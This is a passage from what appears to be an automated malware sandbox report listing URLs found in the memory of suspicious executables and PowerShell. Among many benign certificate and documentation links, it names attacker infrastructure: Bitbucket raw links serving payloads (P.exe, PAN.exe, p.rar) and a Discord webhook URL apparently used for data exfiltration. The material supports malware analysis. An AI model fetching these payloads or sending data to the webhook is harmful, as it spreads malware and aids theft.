http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: clppth.exe, 00000029.00000003.1941900772.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1949554408.000002C498AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: svchost.exe, 00000023.00000003.1651367816.000001B218D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000003.00000002.1643088733.000001D468375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B60D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.org
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B5F491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B8DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1635112128.0000019C71BA3000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71BA7000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1637123662.0000019C71BB1000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1984833829.00000276FE774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3805594021.00007FFB0B4C8000.00000008.00000001.01000000.0000001B.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.2060011719.000002C498ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B5F491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B8DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B8DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D4594DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B928E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                        Source: powershell.exe, 0000001E.00000002.2116052383.00000190B7030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/PAN.ex
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/Window
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45937A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfuture91/goodfuture511/raw/984b882302ec52a90ac71aa3b8aecff3900592a4/P.exe
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B9224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/goodfutureX
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                        Source: powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1497421294.000002C8869BE000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1857780070.00000156D218E000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1951262898.000002C498ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Connection
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002958000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3781786727.0000019C71A28000.00000004.00001000.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71C46000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3790153059.00000276FF17C000.00000004.00001000.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3786213704.00000276FED4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1271628910563688513/iSNor1MhL11el5i9poMvSd3l-pO6Mm7YcVe7rrm7Jtdksty
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1637003082.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1636121926.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3780249098.0000019C715F0000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1984833829.00000276FE774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71266000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3778402873.0000019C7119C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D45949D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                        Source: svchost.exe, 00000023.00000003.1651367816.000001B218D79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                        Source: svchost.exe, 00000023.00000003.1651367816.000001B218D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3781370507.0000019C71780000.00000004.00001000.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3779932221.0000019C71480000.00000004.00001000.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71C46000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3786213704.00000276FED4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/3022-2
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C71240000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1627630789.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1978563759.00000276FE3BB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3778402873.0000019C71120000.00000004.00001000.00020000.00000000.sdmp, clppth.exe, 0000002A.00000002.3781902079.00000276FE290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C71240000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1627630789.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1978563759.00000276FE3BB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C71240000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1627630789.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1630490213.0000019C71270000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1978563759.00000276FE3BB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1976993998.00000276FE3BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B600C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B928E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: clppth.exe, 0000002A.00000002.3786213704.00000276FED4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3789777604.0000019C72BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linuxreviews.org/HOWTO_change_the_mouse_speed_
